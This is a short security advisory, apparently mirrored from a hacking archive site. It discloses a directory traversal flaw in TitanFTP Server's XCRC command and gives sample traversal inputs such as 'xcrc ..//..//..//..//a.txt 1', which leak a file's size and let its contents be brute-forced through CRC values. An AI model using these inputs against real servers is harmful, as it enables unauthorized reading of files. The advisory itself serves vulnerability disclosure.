AOH :: HP Unsorted T :: B1A-1295.HTM

TitanFTP Server Arbitrary File Disclosure



TitanFTP Server Arbitrary File Disclosure
TitanFTP Server Arbitrary File Disclosure



Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure=0D
=0D
Details=0D
=0D
==============0D
=0D
Product: TitanFTP Server=0D
=0D
Security-Risk: high=0D
=0D
Remote-Exploit: maybe, assuming anonymous ftp access=0D
=0D
Local-Exploit: yes=0D
=0D
Vendor URL: http://www.southrivertech.com/=0D 
=0D
Found By: Bill Finlayson=0D
=0D
http://www.accensussecurity.com=0D 
=0D
Affected: Versions 8.10.1125 and likely previous=0D
=0D
Issue:  the xcrc command is susceptible to a directory traversal attack which will allow disclosure of the contents of any file on the server=0D
=0D
Details: xcrc ..//..//..//..//a.txt 1  will disclose the file's size=0D
=0D
xcrc ..//..//..//..//a.txt 1 2=0D
xcrc ..//..//..//..//a.txt 1 3=0D
...=0D
xcrc ..//..//..//..//a.txt 1 =0D
=0D
when automated allows for an easy brute force attack on the crc's=0D
=0D
Status: Submitted to Vendor 6/14/10 fixed 6/15/10

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.